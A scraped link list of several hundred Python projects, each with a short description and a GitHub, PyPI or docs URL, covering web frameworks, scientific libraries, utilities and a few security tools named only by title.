HTML https://github.com/richardcornish/django-markdowny https://pypi.python.org/pypi/badwolf/0.8.2?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss qipipe - Quantitative Imaging pipeline http://qipipe.readthedocs.io/en/latest/ https://github.com/ohsu-qin/qipipe https://pypi.python.org/pypi/hedgehog-station-controller/2.5.3?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss Generate consistent easier-to-remember codenames from strings and numbers. https://github.com/jjmontesl/codenamize aiopogo - a Pokémon API in Python https://github.com/Noctem/aiopogo tag is a free open-source software package for analyzing genome annotation data. It is developed as a reusable library with a focus on ease of use.tag is implemented in pure Python (no compiling required) with minimal dependencies! http://tag.readthedocs.io/en/stable/ celadon : https://github.com/ninapavlich/celadon PyRETIS is a Python library for rare event molecular simulations with emphasis on methods based on transition interface sampling and replica exchange transition interface sampling http://www.pyretis.org/ Chrome browser control, a HTML 5 based Python GUI framework. https://github.com/cztomczak/cefpython https://pypi.python.org/pypi/gather/17.4.1?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss HierarchicalMatrices : https://github.com/maekke97/HierarchicalMatrices https://pypi.python.org/pypi/falsy/2017.4.15.dev101?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss aiodocker : https://github.com/aio-libs/aiodocker django-oss2-storage : https://github.com/keviswang/django-oss2-storage ontospy : https://github.com/lambdamusic/ontospy Run virtual routers with docker https://github.com/plajjan/vrnetlab island : https://github.com/HeeroYui/island/ FBLinkScraper : https://github.com/iCHAIT/FBLinkScraper Everything about your movies within the command line. https://github.com/iCHAIT/moviemon Piglet Templates Piglet is a text and HTML templating language in the kid/genshi/ kajiki family. https://bitbucket.org/ollyc/piglet www.pytables.org : http://www.pytables.org/ Simple JavaScript interpreter for Python https://github.com/amol-/dukpy webob : https://github.com/Pylons/webob depot : https://github.com/amol-/depot depot : https://github.com/amol-/depot formencode : https://github.com/formencode/formencode tg2 : https://github.com/TurboGears/tg2 Unofficial-Quora-API : https://github.com/kalbhor/Unofficial-Quora-API Xonsh is a Python-powered, cross- platform, Unix-gazing shell language and command prompt. The language is a superset of Python 3.4+ with additional shell primitives that you are used to from Bash and IPython. It works on all major systems including Linux, Mac OSX, and Windows. Xonsh is meant for the daily use of experts and novices alike. http://xon.sh/ https://github.com/xonsh/xonsh postman-client : https://github.com/ThCC/postman-client envmgr-cli : https://github.com/trainline/envmgr-cli Command line argument parser https://github.com/pcastellazzi/tauon/ GateFactory : https://github.com/mertyildiran/GateFactory RapidEye : https://github.com/mertyildiran/RapidEye A library that generates application details. https://github.com/gogoair/gogo-utils A cloud.gov UAA authentication backend for Django https://github.com/18F/cg-django-uaa https://pypi.python.org/pypi/dash-core-components/0.4.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss https://pypi.python.org/pypi/dash-core-components/0.4.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss https://pypi.python.org/pypi/dash-core-components/0.4.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss Javascript Visualizations for Ipython https://github.com/rezpe/JupyterViz Signal processing utility functions https://github.com/ryanpdwyer/sigutils Simple markdown integration for Django https://github.com/moccu/django-markymark/ fluquid : https://github.com/fluquid azure-sdk-for-python : https://github.com/Azure/azure-sdk-for-python Python Visual Hash, generate a visual random image associated with a string. https://github.com/luxcem/vizhash apifier : https://github.com/luxcem/apifier Pomegranate is a graphical models library for Python, implemented in Cython for speed.... https://pypi.python.org/pypi/pomegranate/0.7.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss Modern OpenGL 4.1+ Prototype Framework inspired by Django https://github.com/Contraz/demosys-py Pure Python OpenGL framework using PyOpenGL https://github.com/adamlwgriffiths/PyGLy nixstatsagent : https://github.com/NIXStats/nixstatsagent python-tldap : https://github.com/Karaage-Cluster/python-tldap Appier is an object-oriented Python web framework built for super fast app development. It's as lightweight as possible, but not too lightweight. It gives you the power of bigger frameworks, without their complexity. Your first app can be just a few lines long: https://appier.hive.pt/# A tool to surface security issues in python code https://github.com/uber/focuson stable : https://qtconsole.readthedocs.io/en/stable/ crabpy_pyramid : https://github.com/OnroerendErfgoed/crabpy_pyramid pulp-smash : https://github.com/PulpQE/pulp-smash mongo-python-driver : http://github.com/mongodb/mongo-python-driver toro : https://github.com/ajdavis/toro Python library for loading and dumping "yamldown" (markdown with embedded yaml) files. https://github.com/dougli1sqrd/yamldown datestuff : https://github.com/justanr/datestuff OpenWebAmp : https://github.com/justanr/OpenWebAmp Persistent, stale-free, local and cross-machine caching for Python functions. https://github.com/shaypal5/cachier A dataset containing story plots from Wikipedia (books, movies, etc.) and the code for the extractor. https://github.com/markriedl/WikiPlots# swafe : https://github.com/ishuah/swafe API docs for django https://github.com/fanhan/django-api-doc https://pypi.python.org/pypi/russell-cli/0.1.8?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss Basic utils for Python https://github.com/Jackevansevo/basic-utils A parsing library for RIPE Atlas measurement results https://github.com/RIPE-NCC/ripe.atlas.sagan py-string-parser : https://github.com/sanscore/py-string-parser/ A Python ChromeDriver wrapper that takes full page screenshots. https://github.com/sanscore/selenium-chrome-screenshot allink-essentials : https://github.com/allink/allink-essentials/ fMRIprep is a functional magnetic resonance image pre-processing pipeline that is designed to provide an easily accessible, state-of-the-art interface that is robust to differences in scan acquisition protocols and that requires minimal user input, while providing easily interpretable and comprehensive error and output reporting. https://github.com/poldracklab/fmriprep android-strings-format : https://github.com/KonsomeJona/android-strings-format PySniffer configures your Wi-Fi adapter to the monitor mode for packet sniffing. https://github.com/KonsomeJona/PySniffer Minimalist measurement of python code time https://github.com/ramonsaraiva/timy IoC container for Pip.Services in Python https://github.com/pip-services/pip-services-container-python PyVDP - a collection of wrappers for Visa Developer Program APIs https://github.com/ppokrovsky/pyvdp https://pypi.python.org/pypi/litic/0.1.6?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss novel_grab : https://github.com/winxos/novel_grab Virtual Math Lab https://github.com/empet/Math hypothesis-python : https://github.com/HypothesisWorks/hypothesis-python pypkgbuilder : https://gitlab.com/inn0kenty/pypkgbuilder amaas-core-sdk-python : https://github.com/amaas-fintech/amaas-core-sdk-python renderspec : https://docs.openstack.org/developer/renderspec/ conan-package-tools : https://github.com/conan-io/conan-package-tools Bulk update using one query over Django ORM https://github.com/aykut/django-bulk-update A fast and expressive API framework. For Python. https://github.com/tomchristie/apistar Apache Libcloud is a Python library which hides differences between different cloud provider APIs and allows you to manage different cloud resources through a unified and easy to use API https://github.com/apache/libcloud libcloud.apache.org Seriously the cats ass. Seriously. https://github.com/Duroktar/CatsAss Awesome cli tool to try python packages - It's never been easier! https://github.com/timofurrer/try CatsAss : http://pythonhosted.org/CatsAss/ CPython : https://github.com/python/cpython students : https://www.jetbrains.com/shop/eform/students An object relational mapping (with additional functionality) for the LIDC dataset using sqlalchemy. https://github.com/pylidc/pylidc https://pypi.python.org/pypi/coala/0.11.0.dev20170422124948?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss snafu : https://github.com/serviceprototypinglab/snafu the-endorser : https://github.com/eth0izzle/the-endorser Python Image Sequence: Load video and sequential images in many formats with a simple, consistent interface. https://github.com/soft-matter/pims django-rest-framework-msgpack : https://github.com/juanriaza/django-rest-framework-msgpack vega : https://vega.github.io/vega/ Frappé for Developers A full-stack web framework based on Python and Javascript to help you build powerful business apps and nifty extensions. https://frappe.io/ Open source Fantasy Console in Rust (with Python and Lua) https://github.com/Gigoteur/PX8 Digital Communication with Python http://veeresht.github.com/CommPy pyAT.py - AT Commands Handler https://github.com/I2NhbmloZWxweW91/pyAT create-flask-app : https://github.com/Luavis/create-flask-app ozzai : https://github.com/ozzai web_crawler : https://github.com/GanadiniAkshay/web_crawler pycairo : https://www.cairographics.org/pycairo/ hifi.html : http://www.pygame.org/hifi.html Facebook Chat Archive Parser https://github.com/ownaginatious/fbchat-archive-parser python-friskby-controlpanel : https://github.com/FriskByBergen/python-friskby-controlpanel Basic and advanced algorithms and data structures https://github.com/jilljenn/tryalgo qna : https://github.com/jilljenn/qna sentry_elastic_nodestore : https://github.com/hellysmile/sentry_elastic_nodestore pywin32 : https://sourceforge.net/projects/pywin32/ devutils : https://github.com/Rufflewind/devutils node_vm2 : https://github.com/eight04/node_vm2 word_cloud : https://github.com/amueller/word_cloud A fork of vinlib which seems to be abandoned: https://github.com/h3/python-libvin python-dad : https://github.com/h3/python-dad django-pdfutils : https://github.com/h3/django-pdfutils django-courier : https://github.com/h3/django-courier The Shop Management System is targeted to automate the almost all of the shop management processes to reduce the clerical labor of the staff working in Stores both technical and as well as Accounts departments using the software Industry’s latest technologies and cost effective tools there by providing the better control to the management by avo… https://github.com/progaymanalaiwah/Shop-Management-System FHash : https://github.com/progaymanalaiwah/FHash CpAdmin : https://github.com/progaymanalaiwah/CpAdmin Downlaod-Youtube : https://github.com/progaymanalaiwah/Downlaod-Youtube CheckTheValueUsingPyhton : https://github.com/progaymanalaiwah/CheckTheValueUsingPyhton rest_bb-django : https://github.com/saikatharryc/rest_bb-django timingsutil.git : https://bitbucket.org/daycoder/timingsutil.git Exploit and write-up for the calculator challenge at HITB AMS 2017 https://github.com/bkth/hitb-ams-2017-calculator Python tool to check your datasets vs compliance standards https://github.com/ioos/compliance-checker pyhector : https://github.com/openclimatedata/pyhector algoliasearch-client-python-async : https://github.com/algolia/algoliasearch-client-python-async farmer : https://github.com/vmfarms/farmer/ A tool to dump the login password from the current linux user https://github.com/huntergregal/mimipenguin?utm_content=buffer89913&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer admin ui for scrapy/open source scrapinghub https://github.com/DormyMo/SpiderKeeper?utm_content=buffer8dc14&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer Sentry is a cross-platform crash reporting and aggregation platform. https://github.com/getsentry/sentry Module and command line utility to save spoken text to mp3 via the Google Text to Speech (TTS) API https://github.com/pndurette/gTTS paygen : https://github.com/mattj85/paygen Python : https://github.com/mattj85/scripts/tree/master/Python pyqt-by-example : https://github.com/ralsina/pyqt-by-example Log scanner challenge https://github.com/devleague/port-scan-detection-system A pure python HDFS client https://github.com/spotify/snakebite hdfs : https://github.com/mtth/hdfs latest : https://hdfscli.readthedocs.io/en/latest/ A cross platform front-end GUI of the popular youtube-dl written in wxPython. https://github.com/MrS0m30n3/youtube-dl-gui memory_profiler : https://pypi.python.org/pypi/memory_profiler Passer-zhihu : https://github.com/l-passer/Passer-zhihu xstatic : https://bitbucket.org/thomaswaldmann/xstatic latest : https://xstatic.readthedocs.io/en/latest/ Fast Python library for SEGY files. https://github.com/Statoil/segyio newsela : https://github.com/newsela pyramid_simpleform : https://github.com/Pylons/pyramid_simpleform lecs : https://github.com/ragerin/lecs anthem : https://github.com/camptocamp/anthem vmcloak.org : http://vmcloak.org/ django-codenerix-extensions : https://github.com/centrologic/django-codenerix-extensions fut : https://github.com/oczkers/fut https://pypi.python.org/pypi/crds/7.1.1?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss mitmproxy : https://github.com/mitmproxy/mitmproxy https://pypi.python.org/pypi/chromedriver-binary/2.29.1?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss hammr.io : http://hammr.io/ shijian : https://github.com/wdbm/shijian deepdream : https://github.com/google/deepdream skflow : https://github.com/tensorflow/skflow ftw.testbrowser : https://github.com/4teamwork/ftw.testbrowser kuyruk-requeue : https://github.com/cenkalti/kuyruk-requeue A PEG-based parser interpreter with memoization. https://github.com/avakar/speg pycson : https://github.com/avakar/pycson pytoml : https://github.com/avakar/pytoml limecc : https://github.com/avakar/limecc jsonschema2rst : https://github.com/inspirehep/jsonschema2rst argdispatch — Drop-in replacement for argparse dispatching subcommand calls to functions, modules or binaries https://framagit.org:443/spalax/argdispatch HTTP Client Mixin for Tornado RequestHandlers https://github.com/sprockets/sprockets.mixins.http PyGmsh : Gmsh is a powerful mesh generation tool with a scripting language that is notoriously hard to write. The goal of PyGmsh is to combine the power of Gmsh with the versatility of Python and to provide useful abstractions from the Gmsh scripting language so you can create complex geometries more easily. https://github.com/nschloe/pygmsh humilis-vpc : https://github.com/humilis/humilis-vpc latest : https://virtualenv.readthedocs.io/en/latest/ ecent Commits to lorm:master A light weight python mysql client library. https://github.com/zii/lorm modulegraph determines a dependency graph between Python modules primarily by bytecode analysis for import statements. modulegraph uses similar methods to modulefinder from the standard library, but uses a more flexible internal representation, has more extensive knowledge of special cases, and is extensible. https://bitbucket.org/ronaldoussoren/modulegraph https://modulegraph.readthedocs.io/en/latest/ plenum : https://github.com/evernym/plenum sovrin-node : https://github.com/sovrin-foundation/sovrin-node wegene-weapp-cli : https://github.com/wegene-llc/wegene-weapp-cli Add table of contents to markdown files https://github.com/cyriac/pymdtoc Behavior-oriented, expressive, human-friendly assertion library for the 21st century https://github.com/grappa-py/grappa Paternoster provides users with the ability to run certain tasks as root or another user, while ensuring safety by providing a common interface and battle tested parameter parsing/checking. https://github.com/uberspace/paternoster dockerscript : https://github.com/durandj/dockerscript https://github.com/durandj/dockerscript Cookiecutter template for a Python package. https://github.com/audreyr/cookiecutter-pypackage Run your django CMS project as a single-page application (SPA) https://github.com/dreipol/djangocms-spa A Python Package for Monitoring Seismic Velocity Changes using Ambient Seismic Noise | https://github.com/ROBelgium/MSNoise aarchimate : https://github.com/thomwiggers/aarchimate A Python Toolbox for COPASI: https://github.com/CiaranWelsh/PyCoTools Recent Commits to mocktailsmixer:m... Make a DIY Robotic Mocktails Mixer Powered by the Google Assistant SDK https://github.com/Deeplocal/mocktailsmixer m3uspiff 1.0: An M3U to XSPF playlist converter. https://github.com/ibrokemypie/m3uspiff Advanced search language for Django https://github.com/ivelum/djangoql/ Tiny API server for git project version information. Easily check the version of your app. https://github.com/nelsnelson/stardate 0.3.1 : https://pypi.python.org/pypi/notify2/0.3.1 Openpyxl-templates is an extension to openpyxl which is intended to simplify reading and writing of excel tables by limiting restricting the layout of the excel to a standardized table. Openpyxl-templates works based on a template for the file which specifying its strucutre and content. This template has tree levels the workbook, the worksheet and the data columns on each individual sheet. The columns allows for data validation and can ensure that the correct number format is used. Openpyxl-templates also provides shortcuts to features common when working with these kind of files such as "format as table" and the ability to hide all colum https://github.com/SverkerSbrg/openpyxl-templates default : http://openpyxl.readthedocs.io/en/default/ cppmangle : https://github.com/AVGTechnologies/cppmangle Brand New Python Web Framework: https://github.com/pytsite/pytsite hfst.github.io : http://hfst.github.io/ https://pypi.python.org/pypi/chat/1.0.4.dev28?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss Python package for simple blitz.js API connections https://pypi.python.org/pypi/osimis-timer/0.1.1?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss pip-blitz-query : https://github.com/nexus-devs/pip-blitz-query Flexible, extensible web CMS framework https://github.com/bukun/TorCMS Connection to PostgreSQL in Tornado like torndb for MySQL. https://github.com/bukun/tornpg Merges all open python matplotlib figures, alpha build https://github.com/georgewinstone/figures2canvas Calculate radial profile of a given angle https://github.com/JeanBilheux/SectorizedRadialProfile A wrapper for REST APIs https://github.com/mayfield/syndicate/ pypvwatts : https://github.com/mpaolino/pypvwatts Ionization-Cross-Sections : https://gitlab.com/IPMsim/Ionization-Cross-Sections 2.0.3 : https://pypi.python.org/pypi/K3D/2.0.3 cachingutil.git : https://bitbucket.org/daycoder/cachingutil.git run-fortran : https://github.com/lycantropos/run-fortran asynchronous working with PostgreSQL/MySQL based on asyncpg/aiomysql https://github.com/lycantropos/cetus Python ticketing utility for working with tickets in popular tools https://github.com/dmranck/ticketutil Pandas indexing for excel spreadsheets https://github.com/0Hughman0/xl_link Lazylyst is a GUI created for time series review, using a flexible framework for new workflows https://github.com/AndrewReynen/Lazylyst A Linux alternative for EyeLeo https://github.com/slgobinath/SafeEyes acrilog is a Python library of providing multiprocessing idiom to us in multiprocessing environment https://pypi.python.org/pypi/acrilog/0.8.4 0.40.1 : https://pypi.python.org/pypi/meson/0.40.1 keeps you warm in the serverless age https://github.com/racker/fleece Clize: Turn Python functions into command-line interfaces https://github.com/epsy/clize Python module to manipulate function signatures https://github.com/epsy/sigtools betterblame : https://bitbucket.org/niko333/betterblame host manager python library for making it easier to create new services https://github.com/tsuru/hm A library for handling file sequences https://github.com/hoafaloaf/seqparse fillbass Small python files to print pitches. https://github.com/alnkpa/fillbass PyQt viewer for Git commits. https://github.com/hoafaloaf/gitorama python api for tmux https://github.com/tony/libtmux/ https://pypi.python.org/pypi/cypress-common/0.4.9?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss download.html : http://www.sqlalchemy.org/download.html downloads.html : http://matplotlib.org/downloads.html PyBitbucket A Python wrapper for the Bitbucket Cloud REST API. This is not known to work with Bitbucket Server, previously known as Stash. https://github.com/guyzmo/pybitbucket pybel-tools : https://github.com/pybel/pybel-tools 1.1.0.2 : https://pypi.python.org/pypi/vitriolic/1.1.0.2 A suite of utilities for converting to and working with CSV, the king of tabular file formats. https://github.com/wireservice/csvkit JavaBeans-inspired reusable component framework https://github.com/shiroyuki/Imagination Lightweight framework built on top of flask and flask-restful with a touch of magic https://github.com/sebastiandev/peach A cross platform clipboard library https://github.com/sebastiandev/clipton antlr-plsql : https://github.com/datacamp/antlr-plsql jaraco.mongodb : https://github.com/jaraco/jaraco.mongodb wolframalpha : https://github.com/jaraco/wolframalpha PyPDF2 : https://github.com/mstamy2/PyPDF2 bt : https://github.com/pmorissette/bt BroThon : https://github.com/kitware/BroThon seleniumbase.com : http://seleniumbase.com/ A framework for creating channels on Kolibri Studio. https://github.com/learningequality/ricecooker Enables easy modification of Python's syntax on the fly. https://github.com/aroberge/nonstandard Experimenting with changing the way Python works https://github.com/aroberge/python_experiments EasyGUI_Qt is a module for simple and easy GUI programming in Python. https://github.com/aroberge/easygui_qt cmsplugin-slick : https://github.com/paramono/cmsplugin-slick django-oscar-webpay : https://github.com/RaydelMiranda/django-oscar-webpay Prax is a data conversion utility a la radare2's rax. It allows the user to enter a snippet of data in one format and see it in a number of other formats (hex, decimal, binary, raw, Base 64, etc.) and optionally to apply operators to the raw data (swap endianness currently) https://github.com/Jake-R/prax 1.11.82 : https://pypi.python.org/pypi/awscli/1.11.82 botocore : https://github.com/boto/botocore django-padlock : https://github.com/ccapudev/django-padlock/ django-bitfield : https://github.com/disqus/django-bitfield ghowlauth : https://github.com/lsst-sqre/ghowlauth pythonparser https://github.com/m-labs/pythonparser OCRmyPDF adds an OCR text layer to scanned PDF files, allowing them to be searched https://github.com/jbarlow83/OCRmyPDF Making a GUI toolkit https://asrp.github.io/blog/gui_toolkit A python parser that builds python ASTs in 502 lines of python without using modules https://github.com/asrp/pymetaterp A text-to-speech interface with mplayer-like bindings, using espeak https://github.com/asrp/espeakui A visual introspective GUI maker with live editing of the GUI and its editor at the same time https://github.com/asrp/tkui crate : https://github.com/RudolfCardinal/crate A simple, clean, easy to modify Slack chatbot https://github.com/llimllib/limbo This repository implements supplementary useful functions for Python that are not part of the standard library. Examples include useful utilities like transparent support for zipped files etc. https://github.com/materialsvirtuallab/monty latest : http://qiutil.readthedocs.io/en/latest/ pythonlib : https://github.com/RudolfCardinal/pythonlib pymag-trees : https://github.com/llimllib/pymag-trees A scalable, efficient, cross-platform and easy-to-use workflow engine in pure Python https://github.com/BD2KGenomics/toil azure-sdk-for-python : https://github.com/Azure/azure-sdk-for-python https://pypi.python.org/pypi/flake8-docstrings/1.1.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss Python libraries for account and server management https://github.com/ocf/ocflib Get alerts about new job listings. https://github.com/matthewmckenna/jobnotify TensorFlow project scaffolding https://github.com/fomorians/tfstage CatsAss : https://pypi.python.org/pypi/CatsAss WAMP (Web Application Messaging Protocol) client component for Asphalt https://github.com/asphalt-framework/asphalt-wamp A python library for variable type checker/validator/converter at run time. https://github.com/thombashi/typepy A python library to write a table in various formats: CSV / HTML / JavaScript / JSON / LTSV / Markdown / MediaWiki / Excel / Pandas / Python / reStructuredText / TOML / TSV. https://github.com/thombashi/pytablewriter A python library to simplify the table creation and data insertion into SQLite database (Automatic table creation from data. Support various data types for insertion: dictionary/namedtuple/list/tuple. Convert from other formats: CSV/JSON/Google-Sheets/TableData) http://simplesqlite.rtfd.io/ https://github.com/thombashi/SimpleSQLite A simple tc command wrapper tool. Easy to setup traffic control of network bandwidth/latency/packet- loss/packet-corruption to network interfaces. https://github.com/thombashi/tcconfig DataProperty : https://github.com/thombashi/DataProperty DateTimeRange : https://github.com/thombashi/DateTimeRange odoo : https://github.com/odoo/odoo 0.0.3 : http://replyify.com/ https://pypi.python.org/pypi/django-replyify-oauth2/0.0.3 terminal-leetcode : https://github.com/chishui/terminal-leetcode wiki : https://github.com/ctuning/ck/wiki pip-blitz-query : https://github.com/nexus-devs/pip-blitz-query python-datafaser : https://github.com/korpiq/python-datafaser https://pypi.python.org/pypi/maildrake/0.1.8?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss gixy : https://github.com/yandex/gixy pyvera : https://github.com/pavoni/pyvera pyvera : https://github.com/pavoni/pyvera fstring427 : https://github.com/smartvid-io/fstring427 https://pypi.python.org/pypi/caicloud.tensorflow/2.0.2?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss https://caicloud.io/ commongroups : https://github.com/akokai/commongroups p22p : https://github.com/bennr01/p22p stash : https://github.com/ywangd/stash HIDrem : https://github.com/bennr01/HIDrem https://pypi.python.org/pypi/execsql/1.16.3.2?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss Simple Python version management https://github.com/pyenv/pyenv olapy : https://github.com/abilian/olapy recolor-dots : http://github.com/raghavsub/recolor-dots alkali : https://github.com/kneufeld/alkali django-dynamicstatics : https://github.com/kneufeld/django-dynamicstatics Twisted-based asynchronous Tor control protocol implementation. Includes unit-tests, examples, state- tracking code and configuration abstraction. https://github.com/meejah/txtorcon Command-line utility to control Tor. https://github.com/meejah/carml check-reserved-instances : https://github.com/TerbiumLabs/check-reserved-instances lea : https://bitbucket.org/piedenis/lea wagtail-pg-search-backend : https://github.com/wagtail/wagtail-pg-search-backend Standards-compliant library for parsing and serializing HTML documents and fragments in Python https://github.com/html5lib/html5lib-python 0.8.3 : https://pypi.python.org/pypi/pycolorize/0.8.3 py_link_preview : https://github.com/aakash4525/py_link_preview PythonWithC : https://github.com/aakash4525/PythonWithC autowire : https://github.com/hardtack/autowire WiringPi-Python : https://github.com/WiringPi/WiringPi-Python/ https://pypi.python.org/pypi/fc-matplotlib4mesh/0.0.2?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss project_gulag : https://bitbucket.org/jorjun/project_gulag A single file container/archive that can be reconstructed even after total loss of file system structures https://github.com/MarcoPon/SeqBox blockchain-exploration : https://github.com/MarcoPon/blockchain-exploration Software to automate the management and configuration of any infrastructure or application at scale. Get access to the Salt software package repository here: https://github.com/tonybaloney/salt nbextensions : https://github.com/simonm3/nbextensions pyaqara : https://github.com/javefang/pyaqara python-bloom-filter : https://github.com/hiway/python-bloom-filter spritzbot : https://github.com/hiway/spritzbot mim : https://github.com/simonm3/mim cudnnenv : https://github.com/unnonouno/cudnnenv Morpheme Regular Expression Printer https://github.com/unnonouno/mrep JSON processor with Python one-liner https://github.com/unnonouno/jqp 3D HTML5 Presentations from a simple MarkDown file. Convert a GitHub README.md to Presentations with one command https://github.com/juancarlospaco/microraptor#microraptor Trayicon with Unicode Emoticons using Python3 Qt5 https://github.com/juancarlospaco/unicodemoticon Simple Multipurpose Helper Utility Library for Python3 Apps. https://github.com/juancarlospaco/anglerfish css-html-prettify : https://github.com/juancarlospaco/css-html-prettify flake8_tuple : https://github.com/ar4s/flake8_tuple Telegram Remote-Shell https://github.com/fnzv/trsh Smart-Detection-System : https://github.com/fnzv/Smart-Detection-System ICMPme : https://github.com/fnzv/ICMPme kerutils : http://github.com/samyzaf/kerutils flask-logmanager.git : https://github.com/fraoustin/flask-logmanager.git Recent Commits to Sublime2pdf:mast... /!\ inactive /!\ plugin for sublime generate a pdf file for print https://github.com/fraoustin/Sublime2pdf 0.2.5 : https://pypi.python.org/pypi/gampc/0.2.5 useful_inkleby : https://github.com/ajparsons/useful_inkleby Network : https://github.com/wow2006/Network fillbass : https://github.com/alnkpa/fillbass Standalone TensorBoard for visualizing in deep learning https://github.com/dmlc/tensorboard https://pypi.python.org/pypi/ActionML/0.0.8?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss python-zentropi : https://github.com/zentropi/python-zentropi 1.01 : https://pypi.python.org/pypi/InstaGaana/1.01 Online Python Editor With Live Syntax Checking and Execution https://github.com/ethanchewy/PythonBuddy pysensibo : https://github.com/andrey-git/pysensibo pony-bottle-server : https://bitbucket.org/gagan-preet/pony-bottle-server django-mako-plus : https://github.com/doconix/django-mako-plus Python Telegram bot api. https://github.com/eternnoir/pyTelegramBotAPI Statically is a simple static website generator. https://github.com/joajfreitas/statically pddoc : https://github.com/uliss/pddoc https://pypi.python.org/pypi/borgbackup/1.1.0b5?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss https://pypi.python.org/pypi/pytablereader/0.9.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss edm : https://github.com/bemineni/edm pluggable-output-processor.html : http://zaufi.github.io/pluggable-output-processor.html botlib : https://bitbucket.org/bthate/botlib PyFractalTree : https://github.com/PixelwarStudio/PyFractalTree wikidata : https://github.com/dahlia/wikidata SQLAlchemy extension for attaching images to entities https://github.com/dahlia/sqlalchemy-imageattach libsass-python : https://github.com/dahlia/libsass-python SimpleSQLite is a Python library to simplify the table creation and data insertion into SQLite database. https://github.com/thombashi/SimpleSQLite pulseeffects : https://github.com/wwmm/pulseeffects A Python Library for Energy Profile and Abstract Grid(2D/3D) plotting https://github.com/PytLab/catplot VASPy : https://github.com/PytLab/VASPy KalekoChess : https://github.com/kaleko/KalekoChess flask-apidoc : https://github.com/ipconfiger/flask-apidoc pyImageServer : https://github.com/ipconfiger/pyImageServer TorCast : https://github.com/ipconfiger/TorCast free4my : https://github.com/ipconfiger/free4my portinus : https://github.com/justin8/portinus gvar : https://github.com/gplepage/gvar pybingwallpaper : https://github.com/genzj/pybingwallpaper django-logtailer : https://github.com/fireantology/django-logtailer https://pypi.python.org/pypi/AcademicTorrents/1.11?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss A very simple wrapper library to facilitate writing text and commands to the Adafruit USB / Serial LCD Backpack https://github.com/dinofizz/adafruit-usb-serial-lcd-backpack putio-cli : https://github.com/dinofizz/putio-cli putio.py : https://github.com/cenkalti/putio.py 1.6.2 : https://pypi.python.org/pypi/dnsdiag/1.6.2 python-textile : http://github.com/textile/python-textile latest : http://pockets.readthedocs.io/en/latest/ ppretty : https://github.com/symonsoft/ppretty delegation : https://github.com/symonsoft/delegation Mr. Queue - A distributed worker task queue in Python using Redis & gevent https://github.com/pricingassistant/mrq just : https://github.com/kootenpv/just An intuitive library to add plotting functionality to scikit-learn objects. https://github.com/reiinakano/scikit-plot pyinstrument_cext : https://github.com/joerick/pyinstrument_cext A password manager for Computer Security class https://github.com/regexpressyourself/passman https://pypi.python.org/pypi/ttable/0.6.0?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss django-menu-generator : https://github.com/RADYConsultores/django-menu-generator Better tutorial documentation with Sphinx https://github.com/nyergler/tut Chooses a file from a directory. Very handy to re-watch tv series! https://github.com/weisslj/choose-next 2.0.0 : https://pypi.python.org/pypi/bullet-dodger/2.0.0 vlc-helper : https://github.com/kenjyco/vlc-helper rules : https://github.com/jruizgit/rules redpipe : https://github.com/72squared/redpipe napfs : https://github.com/happybits/napfs mocp-cli : https://github.com/kenjyco/mocp-cli pyvoronoi : https://github.com/Voxel8/pyvoronoi HistoryObjectRecognition : https://github.com/Nikasa1889/HistoryObjectRecognition insteontcp : https://github.com/heathbar/insteontcp trademark-marker : https://github.com/null-none/trademark-marker Let AngularJS play well with Django https://github.com/jrief/django-angular django-websocket-redis : https://github.com/jrief/django-websocket-redis Utils to track requests to Django Rest Framework API views https://github.com/aschn/drf-tracking pandas : https://github.com/pandas-dev/pandas bingraphvis : https://github.com/axt/bingraphvis angr-utils : https://github.com/axt/angr-utils CuteR : https://github.com/chinuno-usami/CuteR https://pypi.python.org/pypi/django-lorikeet/0.1?utm_source=dlvr.it&utm_medium=https%3A%2F%2Fpypi.python.org%2Fpypi%3F%3Aaction%3Drss pyalgs : 